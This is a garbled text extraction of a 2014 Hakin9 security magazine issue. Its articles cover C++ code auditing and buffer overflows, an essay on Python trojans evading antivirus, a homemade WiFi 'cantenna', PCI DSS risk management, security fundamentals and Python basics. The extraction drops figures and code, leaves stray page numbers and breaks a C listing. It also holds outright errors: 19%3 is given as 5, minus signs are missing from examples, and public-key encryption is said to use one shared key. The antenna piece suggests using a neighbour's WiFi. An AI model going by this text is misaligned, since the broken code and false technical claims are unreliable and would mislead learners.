Hakin9 - Practical Protection - Step by Step Guide To Learning Python 2014
Hakin9 - Practical Protection - Step by Step Guide To Learning Python 2014
Hakin9 - Practical Protection - Step by Step Guide To Learning Python 2014
Table of Contents
07
12
20
23
32
38
40
45
52
63
70
by Mohammed AlAbbadi
Offensive Python
by Kris Kaspersky
Having Fun with Antennas and Why You Need to Make Your Own
by Guillaume Puyo
Evidence Analysis
by Mudit Sethia
77
81
88
95
98
113
140
145
151
155
159
163
171
173
Write a Web App and Learn Python. Background and Primer for Tackling the
Django Tutorial
by Adam Nelson
181
186
194
198
208
211
216
218
227
Philosophy of Python
by Douglas Camata
Dear Readers,
e would like to introduce a special issue made by Hakin9. This time will deal
with Python. The articles we published are not only for hacker but also will help
you program in Python. Moreover, we added some articles on C++. You will
learn how to conduct an audit using C++ Code analysis. You can compare it with offensive
programming with Python. For sure after reading our step-by-step tutorials you will become
a professional auditor with must-have knowledge about Python programming. You will get to
know how to analyze source code to find vulnerabilities which will help you to protect your
websites and applications.
This time you will a reach section Extra articles about Payment Cards, Hardware Hacking and
Evidence Analysis.
Enjoy reading,
Ewa & Hakin9 Team
[ GEEKED AT BIRTH ]
Whilst every effort has been made to ensure the highest quality
of the magazine, the editors make no warranty, expressed
or implied, concerning the results of the contents usage.
All trademarks presented in the magazine were used for
informative purposes only.
All rights to trademarks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
Approaches
One of the very important rule of thumb for code audit and analysis is taking into consideration time
constraints since we dont have the infinite luxury of time to audit and analyze the code. It is imperative to
understand the product (application) written in the specific language which in our context is an application
code snippet written in C++ with a clearly defined approach such as:
Looking out for the most bugs
Looking out for the easiest to find bugs
Looking out for the weaknesses that are most reliable to exploit
With the above clearly defined we can now prioritize our efforts. It is very important to limit the approach since we
wont ever have enough time to find all the bugs.
Methodology
It is essential we have an understanding of the application. Such an understanding can be achieved with the
following methods.
Scales Well and Can be run on lots of software, and can be repeatedly.
For things that such tools can automatically find with high confidence, such as buffer overflows, SQL
Injection Flaws, etc. they are great.
Many types of security vulnerabilities are very difficult to find automatically, such as authentication
problems, access control issues, insecure use of cryptography, etc. The current state of the art only allows
such tools to automatically find a relatively small percentage of application security flaws. Tools of this type
are getting better, however.
High numbers of false positives.
Frequently cant find configuration issues, since they are not represented in the code.
Difficult to prove that an identified security issue is an actual vulnerability.
Many of these tools have difficulty analyzing code that cant be compiled. Analysts frequently cant compile code
because they dont have the right libraries, all the compilation instructions, all the code, etc.
GrammaTech CodeSonar
CodeSonar is a source code analysis tool that performs a whole-program, interprocedural analysis on
C and C++, and identifies programming bugs and security vulnerabilities at compiling time. CodeSonar
is used in the Defense/Aerospace, Medical, Industrial Control, Electronic, Telecom/Datacom and
Transportation industries.
Splint
This tool is used to check programs developed in C for security vulnerabilities and coding mistakes.
Flawfinder
Flawfinder works by using a built-in database of well-known C and C++ function problems, such as buffer
overflow risks, format string problems, race conditions, potential shell meta-character dangers, and poor
random number acquisitions.
FindBugs
FindBugs uses static analysis to inspect code written in Java for occurrences of bug patterns and finds real
errors in most Java software.
RATS
RATS, short for Rough Auditing Tool for Security, only performs a rough analysis of an applications source
code. It does not find all errors and may also flag false positives.
ITS4
This is a simple tool that statically scans C and C++ source code for potential security vulnerabilities. ITS4
is also a command-line tool that works across UNIX and Windows platforms by scanning source code and
looking for function calls that are potentially dangerous.
9
Processing Results
The outcome of Code Analysis and Audit wouldnt be considered useful if the flaws of the application are
not improved upon. The result should provide outcome so as to make recommendations on useful changes
that needs to be implemented.
This can only be achieved using complete documentation and accurate triaging
Documentation should include pointers to a flawed code, an explanation of the problem, and justification for
why this is vulnerability. Adding recommendations for a fix is a useful practice but selecting and preparing
the actual solution is the responsibility of the code owners.
Triaging process depends on the threshold of the security bug and also an understanding of the priorities. If
the severity is set to highten, then immediate attention should be given for fixing.
Conclusion
C++ Code Analysis and Audit provides useful information on security vulnerabilities and recommendations
for redesign. It also provides opportunity for organizational awareness which would improve effectiveness
and help to prioritize efforts.
Automated security tools are able to identify more errors but some vulnerabilities might be missed. Manual
analysis shouldnt be a replacement for these tried and tested tools, but it can be advantageously integrated
with them.
10
References
http://en.wikipedia.org/wiki/Functional_specification
https://docs.google.com/presentation/d/16PiS_8oIzTwye58NsbRSipyNz9q-F-64eGZyalpbnLg/edit#slide=id.g79541baf _0_30
http://en.wikipedia.org/wiki/Attack_surface
http://en.wikipedia.org/wiki/Business_logic
https://www.owasp.org/index.php/Source_Code_Analysis_Tools
https://na.theiia.org/Pages/IIAHome.aspx
http://en.wikipedia.org/wiki/Dynamic_code_analysis
http://www.codeproject.com/Tips/344663/Static-code-analysis
11
Figure 1. Superman
Though it used to be a dream as a child, today it is a reality; not only for me but for all of us (at least, the
vigilante wannabes). Now, hold your horses; this is neither another scientific breakthrough about a new
technology that perhaps can be integrated with Google Glass (I wish it were), nor a limitless magical pill
that mutates your eye structure. This is simply the ability to scan the core of almost all objects around us to
find their vulnerabilities and correct them ahead of time before someone else finds them and exploits them.
Did I say the core?!! Ooh, I meant the code. Confused yet? Let me explain [1].
Most systems today are computerized (hint: the car mentioned above) and therefore they are basically pieces
of code. The so called code is developed by programmers in different programming languages (such as
Java, .Net, C++, etc) and may include weaknesses or vulnerabilities that allow people, like me a s a child, to
abuse them (hint: injecting code into the car to change its behavior). On the other hand, sometimes you may
12
Where to start?
The idea is to use a tool to automatically detect all security flaws and recommend corrections. There are
different types of tools that can be used in different situations. If the source code is available, then static code
analysis tools are used to detect flaws. Otherwise, debuggers/disassemblers can be used to reverse engineer
the compiled code and identify buffer overflows. Fuzzing techniques and tools can be used to provide
random or invalid data input to applications to observe their behavior. Having said all of that, a simple text
editor like notepad is sufficient to manually review the code, but it takes more time, effort and knowledge. In
Table 1, youll find examples of famous static code analysis Tools [2].
13
14
}
return 0;
The problem with the above code is that when the program asks the user to enter a word, it doesnt check the
array boundaries. Though A is of 8-character size, putting a 9-character word such as excessive as an
input will overflow the allocated 8 character A buffer and overwrite the B buffer with the e character and
the null character.
Buffer overflows are generally of many types: Stack based and Heap based are a few and fall under but not
limited to one or more of the following categories:
Boundary Checking (like the example above)
String format
Constructors & Destructors
Use-after-free
Type confusion
Reference pointer
The objective of the article is not to explore all types of buffer overflows and code review techniques rather
an overview of the whole process.
Detection/identification tools
There are many static code analysis tools, some of which are commercial such as IBM Appscan Source Edition
and HP Fortify Static Code Analyzer, and some of which are academic/free/open source such as Flawfinder,
Clang Static Analyzer and Cppcheck. Below is a snapshot of Cppcheck under progress. Notice that more than
3000 code files got to be analyzed in under one minute (Figure 3).
15
The next snapshot shows the results of the analysis (Figure 4).
Targeted at both the development community and the community of security practitioners, Common
Weakness Enumeration (CWE) is a formal list or dictionary of common software weaknesses that can
occur in softwares architecture, design, code or implementation that can lead to exploitable security
vulnerabilities [2]. According to CWE 805 titled Buffer Access with Incorrect Length Value, the
software uses a sequential operation to read or write a buffer, but it uses anincorrectlength value (look at
the figure below) that makes it to access memory that is outside the bounds of the buffer. [6]
And the solution lies in setting the pointer to a large buffer as illustrated Figure 6.
17
Risk mitigation
There are four risk mitigation strategies: avoid the risk, reduce the risk, transfer the risk or accept the risk.
The overall risk can be avoided by not releasing or developing such software or perhaps using a type safe
language in the first place. For the sake of the argument, avoiding, transferring & accepting the risk will not
be discussed here. As for risk reduction, it can be done through reducing the vulnerability values, number of
vulnerabilities or the likelihood of the security risks to happen. Below is a list of suggested controls that can
be implemented to reduce the risk of buffer overflows:
Using safer compilers
Disabling the stack execution
Preventing return addresses from being overwritten
Reducing the amount of code that runs with root privileges
Avoiding the use of unsafe functions such as strcpy(), gets(), etc.
18
References
[1] http://c85c7a.medialib.glogster.com/media
[2] http://www.embedded.com/design/other/4006735/Integrate-static-analysis-into-a-software-development-process
[3] http://www.redhatz.org/page.php?id=22
[4] http://samate.nist.gov/Main_Page.html
[5] http://cwe.mitre.org/about/faq.html#A.1
[6] http://cwe.mitre.org/data/definitions/805.html
[7] http://www.embedded.com/design/other/4006735/Integrate-static-analysis-into-a-software-development-process
19
Offensive Python
by Kris Kaspersky
Python was created for fun, but evil hackers use it for profit. Why Python is a new threat for
security industry and how tricky Lucifers kids are lets talk about it.
According to Wikipedia: Python is a widely used general-purpose, high-level programming language. Its design
philosophy emphasizes code readability, and its syntax allows programmers to express concepts in fewer lines of
code than would be possible in languages such as C.
The first statement would surprise a Windows user (how many victims have Python preinstalled?), but
MacBooks and Linux servers is a different story. Python supplies by default and its required by many
programs, so uninstalling Python is not an option.
Python is a pro-choice for hackers targeting Mac OS X and Linux, because its cross platform, unlike binary
files it does not require permission for execution and its absolute not readable from antivirus perspective, so
the second statement in Wikipedia is wrong too.
MAxOSX/Flasfa.A
Is a good example. A simple Trojan, not even obfuscated neither encrypted. Only 16 from 42 anti-viruses
detect it (link to Virus Total http://goo.gl/gOCXCh). Why Im not surprised? Because, its very hard to detect
Python scripts by signatures. Scripts are different from binary files, generated by a compiler. The same logic
(says, a = b + c) could be represented by infinitive (almost) number of ways. The variables maybe stored
in different registers, different local variables and these variables could be addresses via different base
registers. Shortly speaking, the binary representation of a = b + c is not the best signature, but it will work,
generating relative low numbers of false positives.
Ah, dont mention these nasty false positives. An anchor is in the ass! Software vendors are upset and pissed
off, because if at least one antivirus triggers on a file an average user will not take a risk to install it. Vendors
complain and sometimes it comes to a court case, because the vendor loses money. Nobody wins the case (as
far as I know), but antivirus company loses money too, especially, if their antivirus becomes too annoying and
users chooses the antivirus that whispers All Quiet in Baghdad.
In my experience TOP 10 anti-viruses detect less that 30% of malicious files at the moment of the first wave of
infection. The detection rate slowly grows up with in the next 10 days. After 10 days the given antivirus either
detects the disease, or fails (because of limitation of the engine, or because the company has no sample).
What else do you expect, dude? You do need a sample to write a signature for it. Period. Somebody somehow
has to realize that he or she is infected, find the malicious file and send it to his or her favorite antivirus
company. It takes time. Yeah, I know about heuristic and emulation, but... unfortunately nobody created an
emulator for Python yet. Why? The answer is simple. Relative low number of Python Trojans makes no
business value for it, but requires a lot of money and human resources.
Welcome to the real world, dude. Forget marketing bullshit. Antivirus companies focus on detecting the
biggest problems to prevent outbreaks. Generally speaking, an antivirus does not prevent infection. An
antivirus stops massive diseases. To fight with Python antivirus companies have to write thousands lines of
code, create collections of good scripts to check for false positives. Like they have nothing to do. However,
sooner or later it is done and then
20
Coffee break
Java is the most vulnerable platform and target number one for hackers. The classic hit: download-n-execute.
Then HTTP request has Java agent field and the HTTP response is executable file or a python script
were under attack. A simple firewall rules can block up to 90% of the attacks. How to bypass it?
Grab your mug cup to make some mocha. Jython (http://www.jython.org/) is an implementation of Python
which is designed to run on the Java Platform. It consists of a compiler to compile Python source code down
to Java bytecodes which can run directly on a JVM, a set of support libraries which are used by the compiled
Java bytecodes, and extra support to make it trivial to use Java packages from within Jython.
Its a good idea, but a bad implementation. Java decompilers generate endless spaghetti, giving you a
headache and suicidal thoughts. Time comes and goes and you are trying to unravel the tangle. The day
is gone. Finally you realize that the decompiled code is wrong and something is missing. To confirm this
theory you use Java disassemblers.
Wow! The cycle that changed the variable which was never initialized before and never used after its
not hackers bug. Its the decompiler bug. Jython code is too messy and its different from the native Java
compiler. Using Java disassemblers would be an option, but its time to go home and say good bye.
Even if you are brave enough to reconstruct the logic it does not help you to write a good signature,
because you do need special experience to distinguish library code from hackers code.
21
22
23
Fun to imagine
If you take a wire and plug it to a DC generator, the wire will emit a small electromagnetic field, if this
wire is coiled, the field will be stronger, if it is coiled around an iron core, it will become an electromagnet.
Whats important is that Faraday discovered that if a current goes through a coil and that there is another coil
nearby, if we increase the current of the first coil, it will induce a change in the second one across the air.
This electromagnetism propagates through the air and loses power as it travels, reflect, refracts, scatters and
diffracts and thats not even counting the potential interferences.
The problem of using DC is that to continually induce, wed have to continually increase the current which
would be problematic at some point and this is why we need to use AC, while in DC the electrons move
steadily in the same direction, they do this weird dance in AC where they do two steps forward and then
two step backwards, two steps forward again and the chain repeats itself imagine yourself on a rowing
machine, every time you pull you create a peak of energy over time but while youre coming back and
preparing to pull again this energy diminishes, the number of times you pull each second would be the
frequency and if there were a receiving coil next to the rower, the changes happening in the rower would be
induced in the coil and the signal received would look like a sine function: this is our carrier wave, the magic
can finally happen.
When we divide the speed of light by the frequency, we get the wavelength, thats the famous: = c/f
formula with the wavelength in meters, c the speed of light in m/s and f the frequency in Hz, to be precise,
wed use 95% of c which is the speed of the electricity in a wire.
Lets get back to our antennas, earlier we said we needed a coil on the receiving end, thats not entirely
true, lets say we dont care much about receiving the current at the same voltage but wed very much
like to get the information of the signal such as its frequency or the information it carries, to do that we
dont really need the whole package, so we dont really need a coil: using a bit of straight wire will allow
to receive this information, although it will be much, much weaker than if we had put a coil right next to
the emitter: it doesnt matter, we just need to amplify this weak signal again in our receiver, this bit of
straight wire is our antenna.
10 30 50 70 90 110 130 150 170 190 210 230 250 270 290 310 330 350
20 40 60 80 100 120 140 160 180 200 220 240 260 280 300 320 340 360
-1,000
-1,500
Figure 2. A simple Sin(0-2) graph
24
Antenna impedance
A very short word on antenna impedance: the impedance is the amount of resistance the antenna is going to
present to the current it will receive, it relates the current and the voltage that goes through it, so its a very
important value, when you buy an antenna on the market, the impedance will have been matched to 50 ohms
by the manufacturer, this is why you cant just add some length to any antenna, its unlikely that it will work
because extending to your antenna by soldering more metal (even if you keep using multiples) is going
to add some impedance to it and unless you match it again you are going to de-tune it.
Radiation pattern
There are many types of antennas and as much radiation patterns, lets have a look at the most important ones:
The Isotropic antenna is an idealistic lossless antenna that radiates with the same power in every direction, in
Figure 3 you can see it as a circle, but we have to keep in mind that we live in a three dimensions world, so
the isotropic antenna radiation pattern really looks like a perfect sphere. These antennas dont really exist as
such, but we could consider celestial radiators like stars as isotropic emitters.
The Yagi-Uda antenna is a very popular design and you probably use one for your TV, it uses several
elements (driven, reflector, director) and is the most widely used directional antenna as you can see on
Figure 4, the pattern is much longer and narrow. In fact, you simply sacrifice some omnidirectionality so that
your antenna will reach further in one direction, in the pattern we can see that the antenna emits on the right
but also a little on the left, there are two lobes, the main one being the directional one on the right.
An omnidirectional antenna radiation pattern will very much look like the isotropic one in two dimensions,
but in 3D, it will look more like a donut than a sphere.
25
Antenna Gain
Weve all seen expensive so-called High-gain antennas on the market but what does it really mean?
The gain is the ratio between the power emitted by the antenna in its main lobe and what an isotropic antenna
would radiate in that same direction, the gain is usually measured in units called decibels-isotropic (dBi). A little
word of warning here, the decibel is a logarithmic unit, which means that when a manufacturer displays a gain
of 3 dB, they are pretending to double the range of your antenna. The problem is, sometime they display much
more than that and when you start seeing +9dBi antennas (8 times the range) with the same power level, without
any amplification mechanism on the antenna, you can start smiling. This gain measurement is criticized, a lot of
people think it is not realistic to compare an antenna to an isotropic one since it cant possibly exist: to have a more
realistic approach, the gain can be measures in dBd which is the ratio between the power emitted in the antenna
main lobe and what a dipole antenna would radiate in that same direction.
Whats important is that the gain is the amount of omnidirectionality you sacrifice to gain directionality
at the same emitter power level, the way of achieving this is by having longer antennas, remember earlier
when talking about wavelengths, well, having a longer antenna is going to achieve a higher gain: there will
obviously be no impact for the isotropic antenna since its gain is always 1, a higher gain Yagi-Uda will have
a narrower main lobe but which will reach further, the omnidirectional antenna will look a little more like
a disc and less like a donut, in shorter terms, your antenna will reach further but you will have to aim better
towards the destination.
This is it, were done with antenna theory, we know all we need to know to be able to understand how they
work in a superficial but sufficient way for now.
Radiotelescopes
It might be a little bit counter intuitive to point an antenna towards the sky and expect to see something,
however, by analyzing the values received, we can know whats out there
26
Sonic Weapons
These weapons have been quite popular these last few years because they are non lethal and less expensive
than true weapons on the long run.
You probably heard of the Long Range Acoustic Device (LRAD) which is a way of sending sounds across
large distances, these are used on boats, the principle is sound (pun intended), they are meant to be so loud
that you stop whatever youre doing and try to get far away before your eardrums give up.
The Active Denial System is like a science fiction weapon, it projects an energy beam that excites the water
molecules from the surface of its target, like a microwave oven does and when this target is your skin it cant
possibly go well, in practice it causes you to flee because the burning sensation disappears as soon as you get
out of the beam so this is still a non lethal weapon.
TeraHertz imaging
This is the infamous tech used by TSA in US Airports that sees through clothes, in practice it uses
wavelength at the border of infrared and microwaves 100m to 1mm, the challenge here is to have
sufficiently small antennas.
Thats not all there is, because once we overcome the challenge of having ridiculously small antennas,
well be able to communicate at extremely high frequencies (over 300GHz) and since the antennas will be
at the nanometer scale we can just imagine the MIMO arrays were going to have with a million antennas
in our cellphones.
Now, for the fun part, we are now going to build a WiFi directional antenna.
27
Building a Cantenna
There is no mystery there, a Cantenna is an antenna made of a can or of multiple cans.
There are many advantages to building a directional WiFi antenna, first of all, its very cheap to build
whereas its very expensive to buy and theres a reason for it, there is usually very little use in having a
directional WiFi antenna at home (modems and access points are equipped with omnidirectional antennas),
the other reasons are less obvious but for example, you might need to connect to your neighbours
connection for any reasons and would need to have a better reception, another reason you might want to
have a directional antenna might be to use while driving to verify that a side of the road secured their WiFi
properly (to alert them if they didnt). The last reason, is because its fun: youll enjoy yourself while doing it
and youll feel like learning more about antennas, maybe the next step will be to build a Yagi Uda array (plus, a
Cantenna looks cool, like a radar).
Heres a little disclaimer:
if youre missing something, if your can diameter is a little too small or a little too big it doesnt matter, do
it anyway, learn, and experiment
if you tinker a little bit, you should have a lot of the hardware required except the antenna components
which shouldnt exceed $10 if you dont have all the tools, ask a friend, buy it or find another way, and be
resourceful
when using anything that is either fast, hot or noisy, protect yourself, get protection glasses, some gloves
and a mask, please remember that you only have one set of eyes/hands/ears and that it only takes one
mistake to lose them, dont be a hero and get some protection
Youre not building the ultimate antenna, this is a project for learning and having fun with tin cans!, dont
be hard on yourself, if you have fun youll be building another, better antenna in no time.
Youll obviously need a can to do this, go and buy one, diameter should be around 8.25cm and as long as
you can find: where I live there are a lot of cans smaller than this and a lot of bigger cans, there are a rarer
middle type; the one I found was for sliced pineapple.
What well use the can for is called a waveguide, its not the antenna per se, its a device that allows the
waves to travel in a predetermined fashion, in short terms it guides to the real antenna (hence the name).
Figure 7. A can of sliced pineapple: 8.25cm diameter and as long as I could find
28
Figure 8. A N-type female chassis-mount connector on the left and its BNC equivalent
on the right
Use a drill or a nail and a file to make holes big enough for the connector on your can:
29
The rest is up to you, mount it on a small stand, which should be cheap, lengthen the waveguide by adding
another can, paint it, put stickers on it, name it etc ...
The only last thing youll need is a pig tail: a cable to connect your antenna to whatever you want to plug it
onto, that cable should be a coaxial cable with a male N-Type connector on one end (to plug it to your Access
point for example) and the other end should match the female chassis mount connector you used on the can.
30
Summary
This is it people, in a short time, we not only learned about antenna theory but we created our own antenna,
if you had fun, it might be a good start for you, since you already own all of the pieces, you can experiment
with different sizes and try things, just change the can!
It might also be a good introduction to building a Yagi Uda array, in any case, if you wish to learn more
about all this, I can encourage you enough to spend some time on Ham radio amateurs blogs, it was fun
sharing all of this with you, Im usually quite busy but I dont do this nearly as often as I should, thank you
for reading.
31
PCI DSS purpose is to apply on all entities that transmit process or store CHD. It does provide technical and
operational requirements for merchants, acquirers, issuers and service providers as well. Service provider is
not a payment brand but it may impact the security of CHD such as service providers that provide IDS, IPS,
firewalls. They also store, process or transmit cardholder information on behalf of clients, merchants or other
service providers. We consider as CHD, the Primary Account Number (PAN), expiration date, service code and
cardholder name. Sensitive Authentication Data is considered as the Card Verification Values (CAV2/CVC2/
CVV2/CID), PIN and PIN blocks, Track, Track 1, Track 2 Data and full Track. The difference between general
CHD and sensitive CHD is the fact that, sensitive data should never be stored after the authorisation even in an
encrypted form.
Basically, card companies set acquiring banks responsible to comply with PCI DSS, and these acquirers
ensure compliance with the standard via merchants. At the end, merchants must comply with this
standard to protect users personal data that is being stored, processed and transferred. Eventually,
the standard is an agreement between payment card companies, merchants banks and the merchants.
According to the standard, organisations must adhere to twelve PCI requirements and six controls, which
are shown in the table below. Therefore, PCI DSS consultancy is required in order to understand the
processes, procedures and IT technologies that are needed by the business to achieve compliance with it.
However, as explained in the next paragraphs most of the times, compliance does not guarantee security
of information within an organisation.
32
3. Maintain a Vulnerability Management R5: Use and regularly update anti-virus software
Program
R6: Develop and maintain secure systems and applications
4. Implement Strong Access Control Me- R7: Restrict access to cardholder data by business need-to-know
asures
R8: Assign a unique ID to each person with computer access
R9: Restrict physical access to cardholder data
R10: Track and monitor all access to network resources and cardholder data
R11: Regularly test security systems and processes
33
assurance that your organisation keeps controls cost-effective and proportionate to the risks. Firms need both
compliance with PCI DSS to protect CHD and RM to secure and manage risks around the business from
security breaches on all critical information.
RM provides alignment between business and information security that suits the culture and requirements of
your business involving the stakeholders to take critical and cost decisions. Sometimes organisations prefer to
implement only security practises which are not enough to avoid RM and provide 100% security. This does
happen since most firms are dealing with technology assets and operations on daily basis, hence a true RM
program must be followed on all sectors. As shown in Figure 1 there are three steps that must be followed to
provide compliance with PCI DSS. However, if we think RM is needed to manage general information then it
is based on the following six activities (Figure 2):
Asset Identification
Business Impact Assessment
Control Assessment Gap Analysis
Risk assessment
Risk Treatment
Implement agreed Risk Treatment controls and measurements
34
Impact
Financial Impact
Legal Impact
Repudiation Damage
No Impact
No Financial Impact
None
None
Minor Impact
None
Some Impact
Breach of laws, regulations or Multiple customers and bucontract leading to litigation or sinesses aware, local meprosecution & fines
dia coverage
Serious Impact
Perform Gap Analysis or Control Assessment to identify gaps that may exist and improve them. It is a
way to compare current controls and practises helping you find any gaps and areas that suffer from threats
and mitigate the security risks. Decide whether the implemented controls are acceptable to mitigate the
risk and evaluate the risk.
Employ Risk Assessment which calculates the risk value to estimate its significance.
What the risk is?
Risk is the potential that a given threat will exploit vulnerabilities of an asset and hence cause harm
to the organisation (financial, Legal or Damage impact). As a generic process you walk around with
the employees, interviewing them and look what could reasonably cause harm to find any weaknesses
and eventually evaluate the risk. Since the information has been gathered by the control assessment,
interviews with colleagues and interesting parties Risk assessment is responsible to identify risks and
vulnerabilities. The risk value is calculated by multiplying the impact value of the asset, by the likelihood
of a risk to happen by the thread level. Likelihood its referring to the possibility a threat to exploit
vulnerabilities of something happening.
35
It is possible that there will be a security breach within the next three years
It is unlikely that there will be a security breach within the next three years.
A security breach within the next three years will not occur.
Last but not least is the planning and implementation of the risk treatment process. This process depends
on the risk value and is taken place once the risk has already been identified and measured properly. If
the risk falls within the fault-tolerance the team decided to accept the risk. When the impact is too high
and the thread happens frequently, then the business must simply do not implement the specific actions
and avoid the risk. The selected team also can transfer/share the risk in order to reduce the burden of
loss in the event it occurs. The major consideration thus must be taken when you need to reduce security
risks, hence the appropriate level of Management then needs to approve appropriate countermeasures. As
a result, risk treatment lead us to determine the appropriate controls for reducing the risk, the impact of
potential threats and the likelihood of a threat taking advantage of a vulnerable asset.
Following the previous steps at least annually gives a clear vision to the management team how the business
is coordinated having information security in mind. It also keeps them up-to-date if changes happen
in critical operations and services and how to control any vulnerabilities related to PCI DSS and other
information. Risk Assessment benefits organisations meets the requirements of PCI DSS and find additional
controls to reduce risks and not to bypass them.
RM in alignment with PCI DSS requirements, is a guide to organisations, on how to effectively apply the above
principles in order to manage security risks identified by not increasing security risk. It supports the business
process and helps to engender and maintain costumer trust in a business process or service by ensuring that
the costumer receives a consistent service and the quality of the service is preserved. Essential for the business
is the fact that RM must be continuous in regular intervals to help organisations deal and mitigate significant
threats, vulnerabilities and risks in effective manner.
Therefore, as highlighted to the previous paragraphs obviously organisations must be fully aware about the
information they are dealing with and be able to protect all of them. PCI DSS only protects CHD and all
other the data is exposed to critical threats. As a result we introduce the term of RM, its steps, its critical
aspects and benefits.
36
Conclusion
The reason for this article is to present PCI DSS and the requirements that organisations must satisfy in
order to protect CHD from security breaches. However, there exist information that differs from CHD and
organisations must also consider alternative solutions to provide and manage security related to those kinds
of data. Therefore, we demonstrate the ongoing process namely Risk Management which must be followed
by organisations to provide an additional level of security to their assets regarding CIA. This process helps
organisations to understand the impact when assets are corrupted and estimate the risk value depending on
the threats level, the likelihood and impact. By evaluating the risks organisations are also able to address
security issues in effective manner and put in place appropriate controls and measurements to secure critical
operations and assets.
37
Evidence Analysis
by Mudit Sethia
Welcome back to the Novice approach to Evidence Analysis!! By putting the title to be one
of a novice, I really mean it to be novice simple,straight and as it is. There can be no
alteration done to the elementary alphabets ABCD ... Agreed?? (btw I know the other 22
alphabets as well ;))
So lets get back to some serious elements of Information Security from where we bid it a goodbye!!!
We get back to the three fundamental arms of Information Security, the CIA triad. Also, to the other two
arms, that came as Information Security grew older!!!
So we have these five arms of Information Security:
Confidentiality
Integrity
Availability
Authenticity
Non Repudiation
Let us see by an example, how a measure that guarantees security of the information or data achieves these
fundamentals.
Mr. A signs a contract with Mr. B. Mr. A sends the asked details via an e-mail to Mr. B by digitally signing
the document and encrypting the mail. (Here I have assumed the encryption to be of public-key type, where
the same key is used to encrypt and decrypt the message.)
Confidentiality
While a document is being encrypted, it in turn means, that it can be decrypted only through the possession of the key that is meant to. So the message remains confidential in the route to anyone unintended.
Integrity
Integrity means that the data or the information should not be modified in a manner that can not be detected
and is done by any means that is unauthorized. Now it is interesting as a slight change in the document
will completely change the whole encrypted message (skipping details for the benefit of your heads and
Google!!!). That way it achieves integrity.
Availability
Message remains available to both Mr. A and Mr. B (unless their storage space gets over or the deal gets into
legal offices with the messages being shredded).
Authenticity
The message remains authentic as it has been signed by Mr. As digital signature which is unique to him.
Also the key that is used to encrypt the message is unique (however, a better idea is always to use privatekey encryption).
38
Non- Repudiation
It means ... If I killed your senses by making you read this, I will say Yes if asked ... LOL!!!
It means that Mr. A cant deny the fact that he sent the message to Mr. B. It is accomplished as the message
has been signed by Mr. A using his digital signature and that is unique to him.
In this way, we see how a measure taking care of the security of your information makes a goal at all the 5
goal-posts (will try something other than soccer next time!!!).
P.S.: Technically they sometimes differentiate between the literal meanings of Data and Information. In real
life, they are mostly used something like, if one of these goes on a vacation from your mind, you use the
other. As simple as that!!!
Now, with this we end the fundamentals and with the next issue we get on to something that gets your CPU
on a run.
Next issue will deal with:
Data Acquisition: A First Responders Approach
The Fundamentals of Digital Cloning
Keep Reading. Be Safe.
Mail me at write2mudit [at] outlook [dot] com.
39
Python has advanced object oriented design elements which allow programmers to write huge codes.
Python has inclusive standard library which helps programmers write almost any kind of code.
It has industry standard encryption to 3D graphics.
It can be easily installed in a variety of environments such as desktop, cloud server or handheld devices.
In this article you will learn about the basics of Python such as system requirement, installation, basic
mathematical operations and some examples of writing codes in Python. This article is intended to help you
learn to code in Python (Figure 2).
40
41
After this, save the file, you can name it as hello.py. To open Windows, click Start button, in Run option,
type cmd in the prompt. Then you need to navigate to the index where you have saved your first program
and type python hello.py (without quotes). With this effort, you can find out whether your Python is
installed and working properly or not. You can now start writing with more advanced codes (Listing 1).
Listing 1. Simple code example of Python
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12
13:
14:
16:
17:
18:
19:
// def insert_powers(numbers, n)
//
powers = (n, n*n, n*n*n)
//
numbers [n] = powers
//
return powers
static PyObject *
insert_powersl(PyObject *self, PyObject *args)
{
PyObject *numbers:
int n:
42
Arithmetic operators
Python also has arithmetic operators such as addition, subtraction, multiplication, and division. You can
easily use these standard operators with numbers to write arithmetic codes.
Python supports multiplication strings to structure a string with a repeat sequence, for example:
lotsofhellos = hello * 10
Python supports creating new lists with repeating sequence with strings in multiplication operator, for example:
print [1,2,3] * 3
Now, its time to try a simple mathematical program in Python. Here are some simple basic commands of
Python and how you can use them.
Name
Addition
Subtraction
Multiplication
Division
Remainder
Exponent
Example
4+4
8-2
4*3
18/2
19%3
2**4
Output
8
6
12
9
5
16
The simple mathematical operations can be applied easily in Python as well. Here is the list of names as they
are called in Python:
43
In the above example, the machine first calculates 2 * 3 and then adds 1 to it. The reason is multiplication
is on high priority (3) and addition is at the priority (4). In another one, the machine first calculates 1 + 2
and then multiplies it by number 3. The reason is that parentheses are on high priority and addition is on the
low priority than that. In Python the math is being calculated from left to right, if not put in parentheses. It is
important to note that innermost parentheses are being calculated first. For example:
>>> 4 40 3
-39
>>> 4 (40 3)
-33
In this example, first 4-40 is evaluated first and then -3. In the other one, first 40-3 is evaluated and then it is
subtracted from the number 4.
Python is one of the high-level languages available these days. It is one of the most easy to learn and use
languages, and at the same time it is very popular as well. It is being widely used by many professional
programmers to create dynamic and extensive codes. Google, Industrial Light and Magic, The New York
Stock Exchange, and other such big giants use Python. If you have your own computer you can download
and install it easily. Python is free; you can start coding in Python now!
For more information visit: www.widevisiontechnologies.com/.
References
[1] https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&docid=Uu27A3md38FOsM&tbnid=y
gia7G_YS151YM:&ved=0CAMQjhw&url=http%3A%2F%2Fafreemobile.blogspot.com%2F2011%2F07%2Fdownload-pythonfor-symbian.html&ei=FoLuUc2eFc6GrAfsm4GYDA&bvm=bv.49478099,d.aGc&psig=AFQjCNERzUgwmKhr62FF5j_ pKicDzK
gl5Q&ust=1374671724203993
[2] http://www.itmaybeahack.com/homepage/books/nonprog/html/_images/p1c5-fig3.png
[3] http://freegee.sourceforge.net/FG_EN/freegee-overview800.png
[4] http://www.google.com/imgres?start=361&hl=en&biw=1366&bih
[5] https://encrypted-tbn2.gstatic.com/
44
Python Interpreter
As you know by now python is an interpreted language, and it has its interpreter which runs on multiple
platforms such as Windows, Linux, Mac OSX, other UNIX distributions and SL4A which contains a python
interpreter that runs on Android. Linux and Mac OSX come with python 2.7 preinstalled in them, if you are
using Windows you can download IDLE (Python IDE) which has lots of features aside the interpreter. In
this tutorial, we will be using the interactive programming environment which can be accessed through the
terminal in Linux, other Unix distributions and also IDLE.
Getting Started
Enough chit chat, if you are using windows I presume you have installed IDLE, once you open it, it will
give you an interactive environment with the python prompt >>> instantly. For Linux/Unix users, open the
terminal and type
$ python
at your shell prompt, press enter and you should have the python prompt >>> Note. In defining functions or
blocks with more than one line, the interpreter provides . which means a continuation.
45
